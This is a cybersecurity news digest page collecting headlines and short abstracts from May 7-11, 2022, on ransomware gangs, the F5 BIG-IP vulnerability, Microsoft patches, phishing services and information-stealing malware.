Members of the Five Eyes (FVEY) intelligence alliance today warned managed service providers (MSPs) and their customers that they're increasingly targeted by supply chain attacks.BleepingComputer
May 11, 2022 – Attack
Healthcare Technology Provider Omnicell Discloses Ransomware Attack Full Text
Abstract
In its latest Form 10-Q filing with the SEC, the company noted that some of its internal systems were impacted by a ransomware attack on May 4, 2022. There is an impact on certain of the company’s products and services.Security Week
May 11, 2022 – Attack
Bitter cyberspies target South Asian govts with new malware Full Text
Abstract
New activity has been observed from Bitter, an APT group focused on cyberespionage, targeting the government of Bangladesh with new malware with remote file execution capabilities.BleepingComputer
May 11, 2022 – Business
Abnormal Security Raises $200 Million to Provide Email Security Solutions for Businesses Full Text
Abstract
Abnormal Security announced the close of a $210 million Series C round of financing led by global software investor Insight Partners, with participation from Greylock Partners and Menlo Ventures.Help Net Security
May 11, 2022 – Malware
New IceApple exploit toolset deployed on Microsoft Exchange servers Full Text
Abstract
Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography.BleepingComputer
May 11, 2022 – General
Microsoft: The ransomware world is changing, here’s what you need to know Full Text
Abstract
Microsoft security teams are tracking more than 35 unique ransomware families and 250 threat actors across nation-state, ransomware and criminal activities. RaaS has forced Microsoft to look at attacks differently.ZDNet
May 11, 2022 – Government
E.U. Blames Russia for Cyberattack on KA-SAT Satellite Network Operated by Viasat Full Text
Abstract
The Five Eyes nations comprising Australia , Canada , New Zealand , the U.K. , and the U.S. , along with Ukraine and the European Union, formally pinned Russia for masterminding an attack on an international satellite communication ( SATCOM ) provider that had "spillover" effects across Europe. The cyber offensive , which took place one hour before the Kremlin's military invasion of Ukraine on February 24, targeted the KA-SAT satellite network operated by telecommunications company Viasat, crippling the operations of wind farms and internet users in central Europe. Viasat, in late March, disclosed that it had shipped nearly 30,000 modems to distributors to restore service to customers whose modems were rendered unusable. "This cyberattack had a significant impact causing indiscriminate communication outages and disruptions across several public authorities, businesses and users in Ukraine, as well as affecting several E.U. Member States," the CounciThe Hacker News
May 11, 2022 – Vulnerabilities
Microsoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attack Full Text
Abstract
Microsoft Patch Tuesday security updates for May 2022 address three zero-day vulnerabilities, one of them actively exploited. Microsoft Patch Tuesday security updates for May 2022 addressed three zero-day vulnerabilities, one of which is under active...Security Affairs
May 11, 2022 – General
Ransomware has gone down because sanctions against Russia are making life harder for attackers Full Text
Abstract
Ransomware attacks have long been a major cybersecurity issue for organisations around the world. The number of ransomware attacks has gone down in recent months because of increased sanctions against Russian cybercriminals.ZDNet
May 11, 2022 – Government
EU condemns Russian cyber operations against Ukraine Full Text
Abstract
The European Union condemns the cyberattacks conducted by Russia against Ukraine, which targeted the satellite KA-SAT network. The European Union accused Russia of the cyberattack that hit the satellite KA-SAT network in Ukraine, operated by Viasat,...Security Affairs
May 11, 2022 – Phishing
New Phishing-as-a-Service Toolkit Depends on Impersonation Scams Full Text
Abstract
Security analysts discovered a new underground service called Frappo, which is basically a Phishing-as-a-Service (PaaS), that lets cybercriminals host and launch sophisticated impersonation-based phishing scams. The cybercrime service was first seen on March 22, 2021. Given the rise in such threats ... Read MoreCyware Alerts - Hacker News
May 11, 2022 – Skimming
Caramel - New Credit Card Skimmer-as-a-Service Full Text
Abstract
A new credit card stealing service, called Caramel, is growing in popularity. Launched by a Russian cybercrime organization named CaramelCorp, the skimmer-as-a-service can allow any low-skilled threat actors to get started with financial fraud.Cyware Alerts - Hacker News
May 11, 2022 – Government
New Malspam Campaigns Propagate Jester Infostealer - Warns CERT-UA Full Text
Abstract
The CERT-UA warned against a phishing campaign that deploys Jester Stealer for data exfiltration from infected users’ devices. The email campaign carries the subject line chemical attack. The malware cannot be analyzed in virtual machines as the malware developers have implemented anti-analysis cap ... Read MoreCyware Alerts - Hacker News
May 11, 2022 – Malware
DCRat Being Sold on Russian Hacking Forums at Dirt Cheap Rates Full Text
Abstract
Malware authors were spotted selling a capable trojan named DCRat on underground forums. The still-under-development threat comes equipped with a variety of information-stealing abilities. As for protection, always install a reliable anti-malware solution.Cyware Alerts - Hacker News
May 11, 2022 – Criminals
Conti’s Wrath Causes Havoc Across the Globe Full Text
Abstract
Conti becomes the most wanted cybercriminal gang right now on the dark web with the U.S. announcing a $15 million bounty for information on its members. The group has stirred national security concerns in Costa Rica. Further, Conti claims to have leaked intelligence data from the go ... Read MoreCyware Alerts - Hacker News
May 11, 2022 – Phishing
New Wave of Activities From Mustang Panda Full Text
Abstract
Mustang Panda is on a spree to launch phishing campaigns targeting European and Russian entities and using relevant news to lure potential victims. In some cases, the group has used summit- and conference-themed lures in Asia and Europe, and aims to gain as much long-term access to carry out cybere ... Read MoreCyware Alerts - Hacker News
May 11, 2022 – Malware
NetDooka Leverages PrivateLoader Distribution Service to Infect Victims Full Text
Abstract
The new NetDooka malware framework is being distributed by PrivateLoader’s PPI service that features a loader, a dropper, a protection driver, and a powerful NetDooka RAT. PrivateLoader PPI is a malware distribution platform that uses SEO poisoning and files uploaded to torrent sites.Cyware Alerts - Hacker News
May 11, 2022 – Malware
Raspberry Robin Worm Found Dropping Malware Full Text
Abstract
A new malware dubbed Raspberry Robin, having worm-like capabilities, is spreading via external USB drives to target several firms’ networks in the technology and manufacturing sectors. The worm abuses the Microsoft Standard Installer to make a connection to its C2 servers. Go through this repor ... Read MoreCyware Alerts - Hacker News
May 10, 2022 – Vulnerabilities
Critical F5 BIG-IP vulnerability exploited to wipe devices Full Text
Abstract
A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks, attempting to erase a device's file system and make the server unusable.BleepingComputer
May 10, 2022 – Vulnerabilities
Microsoft Releases Fix for New Zero-Day with May 2022 Patch Tuesday Updates Full Text
Abstract
Microsoft on Tuesday rolled out fixes for as many as 74 security vulnerabilities , including one for a zero-day bug that's being actively exploited in the wild. Of the 74 issues, seven are rated Critical, 66 are rated Important, and one is rated low in severity. Two of the flaws are listed as publicly known at the time of release. These encompass 24 remote code execution (RCE), 21 elevation of privilege, 17 information disclosure, and six denial-of-service vulnerabilities, among others. The updates are in addition to 36 flaws patched in the Chromium-based Microsoft Edge browser on April 28, 2022. Chief among the resolved bugs is CVE-2022-26925 (CVSS score: 8.1), a spoofing vulnerability affecting the Windows Local Security Authority ( LSA ), which Microsoft describes as a "protected subsystem that authenticates and logs users onto the local system." "An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller toThe Hacker News
May 10, 2022 – Attack
Critical F5 BIG-IP vulnerability targeted by destructive attacks Full Text
Abstract
A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks, attempting to erase a device's file system and make the server unusable.BleepingComputer
May 10, 2022 – General
Europe’s GDPR coincides with huge drop in Android apps Full Text
Abstract
Europe's data protection regime has reduced the number of apps available in Google Play by "a third," increased costs, and reduced developer revenues, according to a study published Monday.The Register
May 10, 2022 – Criminals
New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity Full Text
Abstract
The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU) said in a report published Monday. "The identification of multiple samples with varying modifications in such a short period of time and the lack of an official new version indicates that REvil is under heavy active development once again." REvil, short for Ransomware Evil, is a ransomware-as-a-service (RaaS) scheme and attributed to a Russia-based/speaking group known as Gold Southfield , arising just as GandCrab activity declined and the latter announced their retirement. It's also one of the earliest groups to adopt the double extortion scheme in which stolen data fromThe Hacker News
May 10, 2022 – Vulnerabilities
Microsoft fixed RCE flaw in a driver used by Azure Synapse and Data Factory Full Text
Abstract
Microsoft disclosed a now-fixed vulnerability in Azure Synapse and Azure Data Factory that could have allowed remote code execution. Microsoft announced to have addressed a critical remote code execution flaw, tracked as CVE-2022-29972 and named SynLapse,...Security Affairs
May 10, 2022 – Government
UK cybersecurity center sent 33 million alerts to companies Full Text
Abstract
The NCSC (National Cyber Security Centre) in the UK reports having served 33 million alerts to organizations signed up for its "Early Warning" service. Additionally, the government agency has dealt with a record number of online scams in 2021, removing more than 2.7 million from the internet.BleepingComputer
May 10, 2022 – Vulnerabilities
QNAP Patches Critical Vulnerability in Network Surveillance Products Full Text
Abstract
QNAP says only VS series NVR devices running QVR are impacted and that the issue was addressed with the release of QVR 5.1.6 build 20220401. The manufacturer encourages all users to update their systems to the latest release.Security Week
May 10, 2022 – General
5 Benefits of Detection-as-Code Full Text
Abstract
TL;DR: Adopt a modern, test-driven methodology for securing your organization with Detection-as-Code. Over the past decade, threat detection has become business-critical and even more complicated. As businesses move to the cloud, manual threat detection processes are no longer able to keep up. How can teams automate security analysis at scale and address the challenges that threaten business objectives? The answer lies in treating threat detections like software or detection-as-code. Watch Panther's On-Demand Webinar: Scaling Security with Detection-as-Code with Cedar to find out how Cedar uses Panther to leverage Detection-as-Code to build high-signal alerts. Detection-as-Code: A New (Hope) Paradigm Detections define logic for analyzing security log data to identify attacker behaviors. When a rule is matched, an alert gets sent to your team for containment or investigation. What is detection-as-code? Detection-as-Code is a modern, flexible, and structured approach to writThe Hacker News
May 10, 2022 – Breach
Hacktivists hacked Russian TV schedules during Victory Day and displayed anti-war messages Full Text
Abstract
Hacktivists yesterday defaced the Russian TV with pro-Ukraine messages and took down the RuTube video streaming site. Hacktivists and white hat hackers continue to support Ukraine against the Russian invasion, in a recent attack, they defaced Russian...Security Affairs
May 10, 2022 – Solution
GitHub announces enhanced 2FA experience for npm accounts Full Text
Abstract
Today, GitHub has launched a new public beta to notably improve the two-factor authentication (2FA) experience for all npm user accounts.BleepingComputer
May 10, 2022 – Criminals
Cybercriminals Are Increasingly Exploiting Vulnerabilities in Windows Print Spooler Full Text
Abstract
Over the past year, various vulnerabilities in Windows Print Spooler have been discovered. By abusing them, cybercriminals have been able to take control of servers and victims’ machines, even without special admin access.Dark Reading
May 10, 2022 – Malware
Experts Detail Saintstealer and Prynt Stealer Info-Stealing Malware Families Full Text
Abstract
Cybersecurity researchers have dissected the inner workings of an information-stealing malware called Saintstealer that's designed to siphon credentials and system information. "After execution, the stealer extracts username, passwords, credit card details, etc.," Cyble researchers said in an analysis last week. "The stealer also steals data from various locations across the system and compresses it in a password-protected ZIP file." A 32-bit C# .NET-based executable with the name "saintgang.exe," Saintstealer is equipped with anti-analysis checks, opting to terminate itself if it's running either in a sandboxed or virtual environment. The malware can capture a wide range of information that ranges from taking screenshots to gathering passwords, cookies, and autofill data stored in Chromium-based browsers such as Google Chrome, Opera, Edge, Brave, Vivaldi, and Yandex, among others. It can also steal Discord multi-factor authentication tokeThe Hacker News
May 10, 2022 – Attack
Threat actors are actively exploiting CVE-2022-1388 RCE in F5 BIG-IP Full Text
Abstract
Threat actors are exploiting critical F5 BIG-IP flaw CVE-2022-1388 to deliver malicious code, cybersecurity researchers warn. Threat actors started massively exploiting the critical remote code execution vulnerability, tracked as CVE-2022-1388,...Security Affairs
May 10, 2022 – Vulnerabilities
Microsoft fixes new NTLM relay zero-day in all Windows versions Full Text
Abstract
Microsoft has addressed an actively exploited Windows LSA spoofing zero-day that unauthenticated attackers can exploit remotely to force domain controllers to authenticate them via the Windows NT LAN Manager (NTLM) security protocol.BleepingComputer
May 10, 2022 – Business
Microsoft Flexes Security Vendor Muscles With Managed Services Full Text
Abstract
Microsoft rolled out a new suite of new managed services aimed at the mid-market, betting that short-staffed organizations will need outside help to reduce bloating attack surfaces and mitigate an ongoing surge in malware attacks.Security Week
May 10, 2022 – Vulnerabilities
Microsoft Mitigates RCE Vulnerability Affecting Azure Synapse and Data Factory Full Text
Abstract
Microsoft on Monday disclosed that it mitigated a security flaw affecting Azure Synapse and Azure Data Factory that, if successfully exploited, could result in remote code execution. The vulnerability, tracked as CVE-2022-29972 , has been codenamed " SynLapse " by researchers from Orca Security, who reported the flaw to Microsoft in January 2022. "The vulnerability was specific to the third-party Open Database Connectivity ( ODBC ) driver used to connect to Amazon Redshift in Azure Synapse pipelines and Azure Data Factory Integration Runtime ( IR ) and did not impact Azure Synapse as a whole," the company said . "The vulnerability could have allowed an attacker to perform remote command execution across IR infrastructure not limited to a single tenant." In other words, a malicious actor can weaponize the bug to acquire the Azure Data Factory service certificate and access another tenant's Integration Runtimes to gain access to sensitive informaThe Hacker News
May 10, 2022 – Phishing
Exclusive: Welcome “Frappo” – Resecurity identified a new Phishing-as-a-Service Full Text
Abstract
The Resecurity HUNTER unit identified a new underground service called 'Frappo', which is available on the Dark Web. “Frappo” acts as a Phishing-as-a-Service and enables cybercriminals the ability to host and generate high-quality phishing pages...Security Affairs
May 10, 2022 – Vulnerabilities
Microsoft May 2022 Patch Tuesday fixes 3 zero-days, 75 flaws Full Text
Abstract
Today is Microsoft's May 2022 Patch Tuesday, and with it comes fixes for three zero-day vulnerabilities, with one actively exploited, and a total of 75 flaws.BleepingComputer
May 10, 2022 – Policy and Law
U.S. Proposes $1 Million Fine on Colonial Pipeline for Safety Violations After Cyberattack Full Text
Abstract
The U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) has proposed a penalty of nearly $1 million to Colonial Pipeline for violating federal safety regulations, worsening the impact of the ransomware attack last year. The $986,400 penalty is the result of an inspection conducted by the regulator of the pipeline operator's control room management ( CRM ) procedures from January through November 2020. The PHMSA said that "a probable failure to adequately plan and prepare for manual shutdown and restart of its pipeline system [...] contributed to the national impacts when the pipeline remained out of service after the May 2021 cyberattack." Colonial Pipeline, operator of the largest U.S. fuel pipeline, was forced to temporarily take its systems offline in the wake of a DarkSide ransomware attack in early May 2021, disrupting gas supply and prompting a regional emergency declaration across 17 states. The incidenThe Hacker News
May 10, 2022 – Attack
FluBot Android malware targets Finland in new SMS campaigns Full Text
Abstract
Finland's National Cyber Security Center (NCSC-FI) has issued a warning about the FluBot Android malware infections increasing due to a new campaign that relies on SMS and MMS for distribution.BleepingComputer
May 10, 2022 – Solution
UK govt releases free tool to check for email cybersecurity risks Full Text
Abstract
The United Kingdom's National Cyber Security Centre (NCSC) today released a new email security check service to help organizations easily identify vulnerabilities that could allow attackers to spoof emails or can lead to email privacy breaches.BleepingComputer
May 10, 2022 – Attack
German automakers targeted in year-long malware campaign Full Text
Abstract
A years-long phishing campaign has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.BleepingComputer
May 10, 2022 – Government
US, EU blame Russia for cyberattack on satellite modems in Ukraine Full Text
Abstract
The European Union formally accused Russia of coordinating the cyberattack that hit satellite Internet modems in Ukraine on February 24, roughly one hour before Russia invaded Ukraine.BleepingComputer
May 9, 2022 – Government
FBI: Rise in Business Email-based Attacks is a $43B Headache Full Text
Abstract
A huge spike in fraudulent activities related to attacks leveraging business email accounts is a billion-dollar-problem.Threatpost
May 09, 2022 – Vulnerabilities
Critical Gems Takeover Bug Reported in RubyGems Package Manager Full Text
Abstract
The maintainers of the RubyGems package manager have addressed a critical security flaw that could have been abused to remove gems and replace them with rogue versions under specific circumstances. "Due to a bug in the yank action, it was possible for any RubyGems.org user to remove and replace certain gems even if that user was not authorized to do so," RubyGems said in a security advisory published on May 6, 2022. RubyGems, like npm for JavaScript and pip for Python, is a package manager and a gem hosting service for the Ruby programming language, offering a repository of more than 171,500 libraries. In a nutshell, the flaw in question, tracked as CVE-2022-29176, enabled anyone to pull certain gems and upload different files with the same name, same version number, and different platforms. For this to happen, however, a gem needed to have one or more dashes in its name, where the word before the dash was the name of an attacker-controlled gem, and which was createThe Hacker News
May 09, 2022 – Outage
Lincoln College to close after 157 years due ransomware attack Full Text
Abstract
Lincoln College, a liberal-arts school from rural Illinois, says it will close its doors later this month, 157 years since it was founded and following a hard hit on its finances after the COVID-19 pandemic and a recent ransomware attack.BleepingComputer
May 9, 2022 – Ransomware
DarkAngels: A Rebranded Version of Babuk? Full Text
Abstract
Researchers have identified DarkAngels, a new ransomware, that bears an uncanny resemblance between it and the Babuk ransomware. It excludes file extensions such as .exe, .dll, and .babyk from encryption. Organizations are recommended to use reliable anti-malware and internet security solutions.Cyware Alerts - Hacker News
May 09, 2022 – Malware
Experts Sound Alarm on DCRat Backdoor Being Sold on Russian Hacking Forums Full Text
Abstract
Cybersecurity researchers have shed light on an actively maintained remote access trojan called DCRat (aka DarkCrystal RAT) that's offered on sale for "dirt cheap" prices, making it accessible to professional cybercriminal groups and novice actors alike. "Unlike the well-funded, massive Russian threat groups crafting custom malware [...], this remote access Trojan (RAT) appears to be the work of a lone actor, offering a surprisingly effective homemade tool for opening backdoors on a budget," BlackBerry researchers said in a report shared with The Hacker News. "In fact, this threat actor's commercial RAT sells at a fraction of the standard price such tools command on Russian underground forums." Written in .NET by an individual codenamed "boldenis44" and "crystalcoder," DCRat is a full-featured backdoor whose functionalities can be further augmented by third-party plugins developed by affiliates using a dedicated integratedThe Hacker News
May 9, 2022 – Malware
DCRat, only $5 for a fully working remote access trojan Full Text
Abstract
Researchers warn of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums. Cybersecurity researchers from BlackBerry are warning of a remote access trojan called DCRat (aka DarkCrystal RAT)...Security Affairs
May 9, 2022 – Insider Threat
Cloud Tech Powers the Hybrid-remote Workforce — and Increases Insider Risk Full Text
Abstract
Cybersecurity practitioners are sounding the alarm bells. Amplified by the not-going-away-anytime-soon Great Resignation and the here-to-stay shift to hybrid-remote work models, Insider Risk sees exponential growth.Threatpost
May 09, 2022 – Hacker
Hackers display “blood is on your hands” on Russian TV, take down RuTube Full Text
Abstract
Hackers continue to target Russia with cyberattacks, defacing Russian TV to show pro-Ukrainian messages and taking down the RuTube video streaming site.BleepingComputer
May 9, 2022 – Vulnerabilities
Critical Flaw Identified in F5 BIG-IP Devices Full Text
Abstract
Security researchers issued an alert to F5 BIG-IP admins to immediately update their devices after creating exploits for a recently disclosed critical CVE-2022-1388, an RCE flaw. The vulnerable devices are mostly used in the enterprise and may allow attackers to exploit the flaw for gaining initial ... Read MoreCyware Alerts - Hacker News
May 09, 2022 – Government
SHIELDS UP in bite sized chunks Full Text
Abstract
Unless you are living completely off the grid, you know the horrifying war in Ukraine and the related geopolitical tensions have dramatically increased cyberattacks and the threat of even more to come. The Cybersecurity and Infrastructure Security Agency (CISA) provides guidance to US federal agencies in their fight against cybercrime, and the agency's advice has proven so valuable that it's been widely adopted by commercial organizations too. In February, CISA responded to the current situation by issuing an unusual " SHIELDS UP! " warning and advisory. According to CISA, "Every organization—large and small—must be prepared to respond to disruptive cyber incidents." The announcement from CISA consisted of a range of recommendations to help organizations and individuals reduce the likelihood of a successful attack and limit damage in case the worst happens. It also contains general advice for C-level leaders, as well as a tip sheet on how to respond to rThe Hacker News
May 9, 2022 – Attack
CERT-UA warns of malspam attacks distributing the Jester info stealer Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) warns of attacks spreading info-stealing malware Jester Stealer. The Computer Emergency Response Team of Ukraine (CERT-UA) has detected malspam campaigns aimed at spreading an info-stealer...Security Affairs
May 09, 2022 – Vulnerabilities
Microsoft releases fixes for Azure flaw allowing RCE attacks Full Text
Abstract
Microsoft has released security updates to address a security flaw affecting Azure Synapse and Azure Data Factory pipelines that could let attackers execute remote commands across Integration Runtime infrastructure.BleepingComputer
May 9, 2022 – Criminals
Emotet is Testing New Attack Chain Full Text
Abstract
Proofpoint researchers have spotted low-volume Emotet activity that is much different from typical Emotet threat behaviors, highly likely that the group is testing a new threat before using it. The campaign was spotted between April 4 and April 19. The testing of different attack chains is mo ... Read MoreCyware Alerts - Hacker News
May 09, 2022 – Malware
Another Set of Joker Trojan-Laced Android Apps Resurfaces on Google Play Store Full Text
Abstract
A new set of trojanized apps spread via the Google Play Store has been observed distributing the notorious Joker malware on compromised Android devices. Joker, a repeat offender , refers to a class of harmful apps that are used for billing and SMS fraud, while also performing a number of actions of a malicious hacker's choice, such as stealing text messages, contact lists, and device information. Despite continued attempts on the part of Google to scale up its defenses, the apps have been continually iterated to search for gaps and slip into the app store undetected. "They're usually spread on Google Play, where scammers download legitimate apps from the store, add malicious code to them and re-upload them to the store under a different name," Kaspersky researcher Igor Golovin said in a report published last week. The trojanized apps, taking the place of their removed counterparts, often appear as messaging, health tracking, and PDF scanner apps that, onceThe Hacker News
May 9, 2022 – Vulnerabilities
Experts developed exploits for CVE-2022-1388 RCE in F5 BIG-IP products Full Text
Abstract
A few days after F5 addressed the critical CVE-2022-1388 Remote Code execution flaw in its BIG-IP products, researchers created exploits for it. Last week security and application delivery solutions provider F5 released its security notification to inform...Security Affairs
May 09, 2022 – Phishing
Ukraine warns of “chemical attack” phishing pushing stealer malware Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT-UA) is warning of the mass distribution of Jester Stealer malware via phishing emails using warnings of impending chemical attacks to scare recipients into opening attachments.BleepingComputer
May 9, 2022 – Education
‘A tragedy’: Closure of 150-year-old college underscores toll of ransomware attacks Full Text
Abstract
A goodbye note posted to the school’s website said that it survived both World Wars, the Spanish flu and the Great Depression, but was unable to handle the combination of the Covid pandemic and a severe ransomware attack in December last year.NBC News
May 09, 2022 – Attack
Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-enabled Microsoft Excel file, opening which leads to computers getting infected with Jester Stealer. The attack, which requires potential victims to enable macros after opening the document, works by downloading and executing an .EXE file that is retrieved from compromised web resources, CERT-UA detailed. Jester Stealer, which was first documented by Cyble in February 2022, comes with features to steal and transmit login credentials, cookies, and credit card information along with data from passwords managers, chat messengers, email clients, crypto wallets, and gaming apps to the attackers. "The hackers get the stolen data via Telegram using statically configured proxy addresses (e.g., withThe Hacker News
May 9, 2022 – Attack
Experts uncovered a new wave of attacks conducted by Mustang Panda Full Text
Abstract
China-linked Mustang Panda APT group targets entities in Asia, the European Union, Russia, and the US in a new wave of attacks. In February 2022, Cisco Talos researchers started observing China-linked cyberespionage group Mustang Panda conducting...Security Affairs
May 09, 2022 – Hacker
Hackers exploiting critical F5 BIG-IP bug, public exploits released Full Text
Abstract
Threat actors have started massively exploiting the critical vulnerability tracked as CVE-2022-1388, which affects multiple versions of all F5 BIG-IP modules, to drop malicious payloads.BleepingComputer
May 9, 2022 – Business
Near $1 Million Fine Proposed for Colonial Pipeline Following Cyber Attack Full Text
Abstract
The U.S. Department of Transportation’s Pipeline and Hazardous Materials Safety Administration (PHMSA) found management failings and has issued a Notice of Probable Violation and Proposed Compliance Order to Colonial Pipeline Company.HS Today
May 09, 2022 – Malware
Hackers are now hiding malware in Windows Event Logs Full Text
Abstract
Security researchers have noticed a malicious campaign that used Windows event logs to store malware, a technique that has not been previously documented publicly for attacks in the wild.BleepingComputer
May 09, 2022 – Attack
Costa Rica declares national emergency after Conti ransomware attacks Full Text
Abstract
The Costa Rican President Rodrigo Chaves has declared a national emergency following cyber attacks from Conti ransomware group. BleepingComputer also observed Conti published most of the 672 GB dump that appears to contain data belonging to the Costa Rican government agencies.BleepingComputer
May 08, 2022 – Criminals
U.S. Offering $10 Million Reward for Information on Conti Ransomware Hackers Full Text
Abstract
The U.S. State Department has announced rewards of up to $10 million for any information leading to the identification of key individuals who are part of the infamous Conti cybercrime gang. Additionally, it's offering another $5 million for intelligence information that could help arrest or convict individuals who are conspiring or attempting to affiliate with the group in a ransomware attack. The department called the Conti variant the "costliest strain of ransomware ever documented." Conti , the work of a Russia-based transnational organized crime group dubbed Gold Ulrick, is one most prolific ransomware cartels that has continued to strike entities globally while simultaneously expanding its empire by absorbing TrickBot and running side hustles that involve data extortion. After the syndicate expressed public support for Russia's invasion of Ukraine in February, it suffered a major breach of its own after its source code and internal chats were releasedThe Hacker News
May 08, 2022 – Vulnerabilities
Researchers Develop RCE Exploit for the Latest F5 BIG-IP Vulnerability Full Text
Abstract
Days after F5 released patches for a critical remote code execution vulnerability affecting its BIG-IP family of products, security researchers are warning that they were able to create an exploit for the shortcoming. Tracked CVE-2022-1388 (CVSS score: 9.8), the flaw relates to an iControl REST authentication bypass that, if successfully exploited, could lead to remote code execution, allowing an attacker to gain initial access and take control of an affected system. This could range anywhere from deploying cryptocurrency miners to deploying web shells for follow-on attacks, such as information theft and ransomware. "We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP," cybersecurity company Positive Technologies said in a tweet on Friday. "Patch ASAP!" The critical security vulnerability impacts the following versions of BIG-IP products - 16.1.0 - 16.1.2 15.1.0 - 15.1.5 14.1.0 - 14.1.4 13.1.0 - 13.1.4 12.1.0 - 12.1.6 11.6.1 - 11.6.5 FixThe Hacker News
May 08, 2022 – Vulnerabilities
Check your gems: RubyGems fixes unauthorized package takeover bug Full Text
Abstract
The RubyGems package repository has fixed a critical vulnerability that would allow anyone to unpublish ("yank") certain Ruby packages from the repository and republish their tainted or malicious versions with the same file names and version numbers.BleepingComputer
May 8, 2022 – Attack
Conti ransomware claims to have hacked Peru MOF – Dirección General de Inteligencia (DIGIMIN) Full Text
Abstract
Conti Ransomware gang claims to have hacked the Peru MOF - Dirección General de Inteligencia (DIGIMIN) and stolen 9.41 GB. The Conti ransomware gang added the Peru MOF - Dirección General de Inteligencia (DIGIMIN) to the list of its victims on its Tor leak...Security Affairs
May 08, 2022 – Vulnerabilities
Exploits created for critical F5 BIG-IP flaw, install patch immediately Full Text
Abstract
Security researchers are warning F5 BIG-IP admins to immediately install the latest security updates after creating exploits for a recently disclosed critical CVE-2022-1388 remote code execution vulnerability.BleepingComputer
May 8, 2022 – General
May 01 – May 07 Ukraine – Russia the silent cyber conflict Full Text
Abstract
This post provides a timeline of the events related to Russia invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing Russia invasion that occurred in the previous weeks: May 06 - Anonymous...Security Affairs
May 08, 2022 – Criminals
Caramel credit card stealing service is growing in popularity Full Text
Abstract
A credit card stealing service is growing in popularity, allowing any low-skilled threat actors an easy and automated way to get started in the world of financial fraud.BleepingComputer
May 8, 2022 – Government
NIST published updated guidance for supply chain risks Full Text
Abstract
The National Institute of Standards and Technology (NIST) has released updated guidance for defending against supply-chain attacks. The National Institute of Standards and Technology (NIST) has released updated guidance for defending against supply...Security Affairs
May 8, 2022 – Attack
US agricultural machinery manufacturer AGCO suffered a ransomware attack Full Text
Abstract
The American agricultural machinery manufacturer AGCO announced that has suffered a ransomware attack that impacted its production facilities. AGCO, one of the most important agricultural machinery manufacturers, announced that a ransomware...Security Affairs
May 8, 2022 – General
Security Affairs newsletter Round 364 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
May 8, 2022 – Government
US DoS offers a reward of up to $15M for info on Conti ransomware gang Full Text
Abstract
The US Government offers up to $15 million for information that helps identify and locate leadership and co-conspirators of the Conti ransomware gang. The US Department of State offers up to $15 million for information that helps identify and locate...Security Affairs
May 7, 2022 – Criminals
U.S. Offers $15 Million Reward for Information on Conti Ransomware Group Full Text
Abstract
The United States state department has offered a reward of up to $15 million for information on the Russia-based Conti ransomware group, which has been blamed for cyber extortion attacks worldwide.Reuters
May 7, 2022 – APT
Researchers Associate North-Korean APT38 Group with More Ransomware Strains Full Text
Abstract
A threat researcher from Trellix claimed that APT38 operators (aka Unit 180 of North Korea) have used Beaf, ZZZZ, ChiChi, and PXJ ransomware strains to extort some of their victims.Cyware Alerts - Hacker News
May 7, 2022 – Vulnerabilities
DLL Hijacking Bug Puts a Hole in Prominent Ransomware Families Full Text
Abstract
A researcher named hyp3rlinx claims that several malware samples are exposed to DLL hijacking, a method used to inject malicious code into a genuine app. The bug could be exploited to stop file encryption.Cyware Alerts - Hacker News
May 07, 2022 – Phishing
Fake crypto giveaways steal millions using Elon Musk Ark Invest video Full Text
Abstract
Fake cryptocurrency giveaways are stealing millions of dollars simply by replaying old Elon Musk and Jack Dorsey Ark Invest videos on YouTube.BleepingComputer
May 7, 2022 – APT
UNC3524 APT Has Got Backdoors, Persistency Tactics Under Its Sleeves Full Text
Abstract
Experts noted that UNC3524 has been persistently targeting the emails of employees in the corporate world that focus on development, mergers and acquisitions, and large transactions, with financial motivation.Cyware Alerts - Hacker News
May 07, 2022 – Vulnerabilities
Trend Micro antivirus modified Windows registry by mistake — How to fix Full Text
Abstract
Trend Micro antivirus has fixed a false positive affecting its Apex One endpoint security solution that caused Microsoft Edge updates to be tagged as malware and the Windows registry to be incorrectly modified.BleepingComputer
May 07, 2022 – Ransomware
US offers $15 million reward for info on Conti ransomware gang Full Text
Abstract
The US Department of State is offering up to $15 million for information that helps identify and locate leadership and co-conspirators of the infamous Conti ransomware gang.BleepingComputer
May 7, 2022 – Malware
Raspberry Robin spreads via removable USB devices Full Text
Abstract
Researchers discovered a new Windows malware, dubbed Raspberry Robin, with worm-like capabilities that spreads via removable USB devices. Cybersecurity researchers from Red Canary have spotted a new Windows malware, dubbed Raspberry Robin, with worm-like...Security Affairs
May 7, 2022 – Malware
Malware campaign hides a shellcode into Windows event logs Full Text
Abstract
Experts spotted a malware campaign that is the first one using a technique of hiding a shellcode into Windows event logs. In February 2022 researchers from Kaspersky spotted a malicious campaign using a novel technique that consists of hiding the shellcode...Security Affairs
May 7, 2022 – APT
US gov sanctions cryptocurrency mixer Blender also used by North Korea-linked Lazarus APT Full Text
Abstract
The U.S. Department of Treasury sanctioned cryptocurrency mixer Blender.io used by North Korea-linked Lazarus APT. The U.S. Department of Treasury sanctioned the cryptocurrency mixer Blender.io used by the North Korea-linked Lazarus APT to launder...Security Affairs
May 7, 2022 – Breach
